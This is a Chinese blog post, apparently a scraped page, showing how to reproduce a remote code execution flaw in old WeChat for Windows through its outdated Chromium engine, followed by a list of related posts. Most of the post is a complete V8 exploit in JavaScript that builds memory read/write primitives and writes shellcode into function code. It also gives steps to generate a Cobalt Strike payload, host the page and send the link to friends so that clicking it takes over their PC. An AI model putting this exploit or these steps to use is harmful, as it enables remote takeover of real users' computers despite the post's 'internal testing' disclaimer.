由于微信采用的是google内核,前些日子google爆出0day远程代码执行漏洞,但是需要关闭沙箱,而微信采用的是老版本google内核,默认关闭沙箱,因此只要微信用户点击恶意连接,可直接获取该PC电脑权限

影响版本

<=3.2.1.141(Windows系统)

声明:

本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。

本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。

本文章只是内部做测试,请大家不要恶意攻击他人,请遵守法律法规。违者,后果自负。

打开cs4.0生成一个payload



将文件保存本地后提取其中的shellcode,将shellcode填入下方代码

ENABLE_LOG = true;

 IN_WORKER = true;

 // run calc and hang in a loop

 var shellcode = [#shellcode];//shellcode替换成自己的

 function print(data) {

 }

 var not_optimised_out = 0;

 var target_function = (function (value) {

   if (value == 0xdecaf0) {

       not_optimised_out += 1;

   }

   not_optimised_out += 1;

   not_optimised_out |= 0xff;

   not_optimised_out *= 12;

});

for (var i = 0; i < 0x10000; ++i) {

   target_function(i);

}

var g_array;

var tDerivedNCount = 17 * 87481 - 8;

var tDerivedNDepth = 19 * 19;

function cb(flag) {

   if (flag == true) {

       return;

   }

   g_array = new Array(0);

   g_array[0] = 0x1dbabe * 2;

   return 'c01db33f';

}

function gc() {

   for (var i = 0; i < 0x10000; ++i) {

       new String();

   }

}

function oobAccess() {

   var this_ = this;

   this.buffer = null;

   this.buffer_view = null;

   this.page_buffer = null;

   this.page_view = null;

   this.prevent_opt = [];

   var kSlotOffset = 0x1f;

   var kBackingStoreOffset = 0xf;

   class LeakArrayBuffer extends ArrayBuffer {

       constructor() {

           super(0x1000);

           this.slot = this;

       }

   }

   this.page_buffer = new LeakArrayBuffer();

   this.page_view = new DataView(this.page_buffer);

   new RegExp({ toString: function () { return 'a' } });

   cb(true);

   class DerivedBase extends RegExp {

       constructor() {

           // var array = null;

           super(

               // at this point, the 4-byte allocation for the JSRegExp `this` object

               // has just happened.

               {

                   toString: cb

               }, 'g'

               // now the runtime JSRegExp constructor is called, corrupting the

               // JSArray.

           );

           // this allocation will now directly follow the FixedArray allocation

           // made for `this.data`, which is where `array.elements` points to.

           this_.buffer = new ArrayBuffer(0x80);

           g_array[8] = this_.page_buffer;

       }

   }

   // try{

   var derived_n = eval(`(function derived_n(i) {

       if (i == 0) {

           return DerivedBase;

       }

       class DerivedN extends derived_n(i-1) {

           constructor() {

               super();

               return;

               ${"this.a=0;".repeat(tDerivedNCount)}

           }

       }

       return DerivedN;

   })`);

   gc();

   new (derived_n(tDerivedNDepth))();

   this.buffer_view = new DataView(this.buffer);

   this.leakPtr = function (obj) {

       this.page_buffer.slot = obj;

       return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);

   }

   this.setPtr = function (addr) {

       this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);

   }

   this.read32 = function (addr) {

       this.setPtr(addr);

       return this.page_view.getUint32(0, true, ...this.prevent_opt);

   }

   this.write32 = function (addr, value) {

       this.setPtr(addr);

       this.page_view.setUint32(0, value, true, ...this.prevent_opt);

   }

   this.write8 = function (addr, value) {

       this.setPtr(addr);

       this.page_view.setUint8(0, value, ...this.prevent_opt);

   }

   this.setBytes = function (addr, content) {

       for (var i = 0; i < content.length; i++) {

           this.write8(addr + i, content[i]);

       }

   }

   return this;

}

function trigger() {

   var oob = oobAccess();

   var func_ptr = oob.leakPtr(target_function);

   print('[*] target_function at 0x' + func_ptr.toString(16));

   var kCodeInsOffset = 0x1b;

   var code_addr = oob.read32(func_ptr + kCodeInsOffset);

   print('[*] code_addr at 0x' + code_addr.toString(16));

   oob.setBytes(code_addr, shellcode);

   target_function(0);

}

try{

   print("start running");

   trigger();

}catch(e){

   print(e);

}

再生成一个html文件调用js文件



存放在网站目录下

生成链接 http://ip/test.html 发给好友点击即可。

微信0day复现的更多相关文章

  1. 【Python】CVE-2017-10271批量自查POC(Weblogic RCE)

    1.说明 看到大家对weblogic漏洞这么热衷,于是也看看这个漏洞的测试方式. 找了几个安全研究员的博客分析,经过几天的摸索大体清楚漏洞由XMLDecoder的反序列化产生. 漏洞最早4月份被发现, ...

  2. python 微信跳一跳辅助 复现

    本来用的是苹果ios得手机,但是步骤较为复杂,没有吃透,最后妥协用了android的机器搞得. 首先找到大牛的github https://github.com/wangshub/wechat_jum ...

  3. Flash 0day漏洞(CVE-2018-4878)复现

    该漏洞影响 Flash Player 当前最新版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞. 本文作者:i春秋作家——F0rmat 前言 ...

  4. Flash 0day CVE-2018-4878 漏洞复现

      0x01 前言 Adobe公司在当地时间2018年2月1日发布了一条安全公告: https://helpx.adobe.com/security/products/flash-player/aps ...

  5. 双杀 0day 漏洞(CVE-2018-8174)复现

    漏洞描述: CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞. 微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修 ...

  6. Flash 0day(CVE-2018-4878)复现过程

    一.前言介绍 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878). 从Ad ...

  7. 由Chromium内核引起的微信内置浏览器rce漏洞复现

    背景 chrome浏览器爆出漏洞,github上公开了poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day,在关闭chrome ...

  8. 本地复现Flash 0day漏洞(CVE-2018-4878)

    影响版本: Adobe Flash Player <= 28.0.0.137 EXP下载地址: 链接: https://pan.baidu.com/s/1_VVQfdx6gsJvEDJj51Jg ...

  9. 20155306 白皎 0day漏洞——漏洞的复现

    一.Ubuntu16.04 (CVE-2017-16995) 1.漏洞概述 Ubuntu最新版本16.04存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供 ...

随机推荐

  1. LC-203

    给你一个链表的头节点 head 和一个整数 val ,请你删除链表中所有满足 Node.val == val 的节点,并返回 新的头节点 . 示例 1: 输入:head = [1,2,6,3,4,5, ...

  2. linux修改中文字符集

    //修改系统配置 cd /etc/profile //末尾加如下代码 export LC_ALL="zh_CN.GBK"export LANG="zh_CN.GBK&qu ...

  3. 几种比较经典的波形及其FFT变换(正弦波,三角波,方波和锯齿波)

    之前上学时我的信号学得最差了,主要原因还是我高数学得不怎么样.可能是人总敬畏自己最不会的,所以我觉得我学过诸多科目中,数学是最博大精深而最妙的,从最开始的一次函数到反比例函数,二次三次函数和双曲线,椭 ...

  4. javascript中的宏任务和微任务(二)

    js事件轮询执行顺序总结: 1)所有的同步任务都在主线程上执行,行成一个执行栈. 2)除了主线程之外,还存在一个任务列队,只要异步任务有了运行结果,就在任务列队中植入一个时间标记. 3)主线程完成所有 ...

  5. 手把手教会将 Windows 窗体桌面应用从.NET Framework迁移到 .NET SDK/.NET 6 格式

    接上篇:手把手教会 VS2022 设计 Winform 高DPI兼容程序 (net461 net6.0 双出) https://www.cnblogs.com/densen2014/p/1614293 ...

  6. CSS简单的网页布局

    1 <!DOCTYPE html> 2 <html lang="en"> 3 <head> 4 <meta charset="U ...

  7. 基于.NetCore开发博客项目 StarBlog - (2) 环境准备和创建项目

    系列文章 基于.NetCore开发博客项目 StarBlog - (1) 为什么需要自己写一个博客? 基于.NetCore开发博客项目 StarBlog - (2) 环境准备和创建项目 ... 基于. ...

  8. 生命周期和作用域 & mybatis执行流程

    流程 sqlSessionFactory 实例化后  --> transactional事务管理-->创建executor执行器-->创建SqlSession-->实现增删改查 ...

  9. os.system 裁掉片头 ffmpeg

    顺序执行多个指令os.system执行终端命令os.system('start ffmpeg -i x222.mp4 "%s.mp3" && del x222.mp ...

  10. VUE3 之 Teleport - 这个系列的教程通俗易懂,适合新手

    1. 概述 老话说的好:宰相肚里能撑船,但凡成功的人,都有一种博大的胸怀. 言归正传,今天我们来聊聊 VUE 中 Teleport 的使用. 2. Teleport 2.1 遮罩效果的实现  < ...